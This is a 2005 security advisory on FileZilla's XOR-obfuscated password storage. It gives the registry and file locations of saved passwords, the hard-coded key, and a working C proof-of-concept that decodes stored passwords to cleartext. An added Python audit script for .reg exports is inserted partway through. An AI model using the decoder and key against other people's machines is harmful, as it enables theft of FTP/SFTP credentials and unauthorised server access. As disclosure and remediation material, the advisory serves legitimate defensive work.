
filezillaWeak.txt

Date: 05 Sep 2005
Reported by: Adrian Pastor
Type: packetstorm
Source: packetstormsecurity.com

FileZilla weakly-encrypted password vulnerability found in the open source FTP/SFTP client. Passwords are stored using weak XOR "encryption" with a hard-coded static cipher key that can be found in the source code, allowing easy reversal and access to the configured FTP/SFTP servers.

Code
  
Title: FileZilla weakly-encrypted password vulnerability  
Risk: HIGH  
Credits: pagvac (Adrian Pastor)  
Date found: 6th August, 2005  
Homepage: www.ikwt.com  
www.adrianpv.com  
E-mail: m123303[ - at - ]richmond.ac.uk  
  
  
Background  
-----------
FileZilla is the most active and most downloaded open source FTP/SFTP
client (according to www.SourceForge.org at time of writing). Currently
there is only a Windows version of this client.
  
For some stats visit:  
http://sourceforge.net/top/mostactive.php?type=week  
http://sourceforge.net/top/toplist.php?type=downloads_week   
  
The project page can be found at:  
http://sourceforge.net/projects/filezilla/  
  
This advisory plus PoC code and executable can be found in the
following links:

http://www.ikwt.com/projects/filezilla-weak-encryption-research.zip
http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip
  
Versions affected  
-----------------
This vulnerability has been successfully tested on versions 2.2.14b   
and 2.2.15. However, it is suspected that most previous versions are   
also affected.  
  
  
Vulnerability summary  
---------------------
- The FileZilla client stores passwords using weak XOR "encryption"
- The value of the cipher key is static (it never changes) and can
be found in the source code
  
  
Description of vulnerability  
----------------------------
FileZilla saves configuration settings in two different locations:

- in an XML file
- in the Windows registry
  
The method used to save configuration settings depends on the
preferences chosen by the user during the installation of
FileZilla. Either way, all configuration settings are stored in
cleartext, EXCEPT for the password, which is stored using very weak
XOR "encryption" that can easily be reversed.
  
The problem with the way the XOR encryption is implemented is that
the same cipher key is always used. This key is hard-coded, which
means that anyone can analyze the source code of the application and
find it. Of course, this wouldn't be so easy if FileZilla weren't an
open source application.
  
Once the key is known, an attacker can use it to decrypt the password
back to its cleartext form. Because XOR is symmetric, the same key is
used for both encrypting and decrypting.
  
As mentioned before, the rest of the configuration settings are all
in cleartext. Information that would be useful to an attacker
includes the hostname of the server to connect to, the default port,
and the username.
  
If successfully exploited, this vulnerability allows an attacker
to access FTP (or SFTP) servers with the privileges of the user whose
configuration settings were stolen.
  
In practice, this vulnerability could be exploited after a machine
has been compromised, or by fooling the user into executing malicious
code. Such code could dump the configuration settings, decrypt the
password(s) and send them all to the attacker.
  
Many popular trojans exploit weak encryption vulnerabilities of this
type. These trojans dump the credentials of popular applications such
as Internet Explorer, VNC or even dialup connections. FileZilla could
be the next application added to the list of those covered by trojans
with password-dumping features.
  
This vulnerability is somewhat similar to the one found by Conde
Vampiro in VNC 3 back in 1999. It's similar because in both cases we
find an open source application using a fixed cipher key to decrypt
passwords, which makes finding the key trivial.
  
For more information on Conde Vampiro's findings visit  
http://www.securiteam.com/securitynews/3P5QERFQ0Q.html  
  
  
Vulnerability details  
---------------------
The XML configuration file is found at:  
  
%programfiles%\FileZilla\FileZilla.xml  
  
Where %programfiles% is the "program files" directory. This is  
usually "c:\program files" by default.  
  
The configuration settings are saved in the registry in:  
  
Hive: HKEY_CURRENT_USER  
Key: Software\FileZilla\Site Manager\[site_name]\  
  
Where [site_name] is the name given to the connection by the user.  
  
The password is saved in the above key as a value with the following
properties:
Value: Pass
Type: REG_SZ (NULL-terminated string)
  
  
The cipher key can be found in Crypt.cpp and its value is:  
"FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"  
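As an added example (not part of the advisory and not FileZilla's own code), the following Python script audits a regedit (.reg) export of the Site Manager key named above and reports which site profiles still have a saved password, so they can be cleared and the credentials rotated. The export text, site names and hosts are constructed sample data; the value name "Pass" is the one the advisory gives, while "Host" is an assumed name for the cleartext hostname setting.

```python
import re

# Constructed sample of a regedit export of HKCU\Software\FileZilla\Site Manager\[site_name].
# Site names and hosts are made up; "Host" is an assumed value name, "Pass" is from the advisory.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\FileZilla\Site Manager\Work FTP]
"Host"="ftp.example.test"
"Pass"="120125125112000"

[HKEY_CURRENT_USER\Software\FileZilla\Site Manager\Public mirror]
"Host"="mirror.example.test"
"Pass"=""

[HKEY_CURRENT_USER\Software\FileZilla\Site Manager\Odd entry]
"Host"="odd.example.test"
"Pass"="12ab"
'''

SITE_KEY = re.compile(r'^\[HKEY_CURRENT_USER\\Software\\FileZilla\\Site Manager\\(.+)\]$')
STRING_VALUE = re.compile(r'^"(\w+)"="(.*)"$')
# The weak scheme stores each XORed byte as three decimal digits (see the PoC below).
WEAK_FORMAT = re.compile(r'^(?:\d{3})+$')

def audit_site_manager(reg_text):
    """One record per site: name, host, whether a password is saved, and whether it looks XOR-encoded."""
    sites, current = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        key = SITE_KEY.match(line)
        if key:
            current = {"site": key.group(1), "host": "",
                       "saved_password": False, "weak_format": False}
            sites.append(current)
            continue
        value = STRING_VALUE.match(line)
        if not (value and current):
            continue
        name, data = value.groups()
        if name == "Host":
            current["host"] = data
        elif name == "Pass":
            current["saved_password"] = data != ""
            current["weak_format"] = WEAK_FORMAT.match(data) is not None
    return sites

def sites_to_remediate(reg_text):
    """Sites whose saved password should be cleared and whose credential should be rotated."""
    return [s["site"] for s in audit_site_manager(reg_text) if s["saved_password"]]
```

A real regedit export is UTF-16 encoded, so read it with `open(path, encoding="utf-16")` before passing the text to `audit_site_manager`.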
  
  
Solution  
--------
Choose "Use secure mode" during the installation (this prevents
FileZilla from saving passwords), lock down the client machines where
the FileZilla client is installed, or update to a patched version
which fixes this issue (if available).
  
  
PoC Code  
--------
```c
/*

Filename: filezilla-pwdec.c
Title: FileZilla Client - Weakly encrypted password exploit v0.01
Author: pagvac (Adrian Pastor)
Date: 8th August, 2005
License: GPL
email: m123303[-a-t-]richmond.ac.uk
homepage: www.ikwt.com (In Knowledge We Trust)
www.adrianpv.com

Description: this tool asks the user for the "encrypted" password and
computes the cleartext version of the password

Other info: compile as a Win32 console application project in Visual
C++

Copyright (C) 2005 pagvac (Adrian Pastor)

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301, USA.

*/


//Includes
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

//Macros
#define MAX_SIZE 150
#define SLEEP_TIME 5000

//Global variable (cypher key, hard-coded in FileZilla's Crypt.cpp)
char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";


//PRE: decimal values representing ASCII chars,
//     every three digits becomes one ASCII char
//     e.g.: 042040063063
//POST: ASCII chars are copied back to buff[]
//      e.g.: *(??
//      the length of the new string is returned
int digit2char(char buff[])
{
    char tmp_buff[4], ascii_buff[MAX_SIZE];
    unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);
    for(i=0,j=0;i<strlen(buff);i+=3,++j)
    {
        /* take one three-digit group and convert it to its byte value */
        tmp_buff[0]=buff[i];
        tmp_buff[1]=buff[i+1];
        tmp_buff[2]=buff[i+2];
        tmp_buff[3]='\0';

        n=atoi(tmp_buff);
        ascii_buff[j]=(char)n;
    }
    ascii_buff[j]='\0';
    printf("ascii_buff:%s\n", ascii_buff);
    strcpy(buff, ascii_buff);

    return len;
}

//PRE: buffer containing ASCII chars of cypher
//     (rather than their numeric ASCII value)
//POST: length of cleartext password is returned
unsigned int decrypt(char buff[])
{
    unsigned int i, pos, len;

    len=digit2char(buff);
    /* the starting offset into the key depends only on the password length */
    pos=len%strlen(m_key);

    /* XOR is symmetric: applying the same key again yields the cleartext */
    for (i=0;i<len;i++)
        buff[i]=buff[i]^m_key[(i+pos)%strlen(m_key)];

    return len;
}

int main(void)
{
    char cypher[MAX_SIZE];
    unsigned int len=0,i=0;

    printf("Enter cypher (encrypted password)\ne.g.: 120125125112000\n->");
    /* the width limit keeps the input inside cypher[] */
    if(scanf("%149s", cypher)!=1)
        return 1;
    if(strlen(cypher)%3==0)
    {
        len=decrypt(cypher);
        printf("cleartext password:");
        for(i=0;i<len;++i)
            printf("%c",cypher[i]);
        printf("\n");
    }
    else
    {
        printf("You didn't enter a valid cypher!\n");
        printf("It should be a numeric value whose length is a multiple of 3\n");
    }

    printf("Ending program in %d seconds...\n", SLEEP_TIME/1000);
    Sleep(SLEEP_TIME);
    return 0;
}
```
  
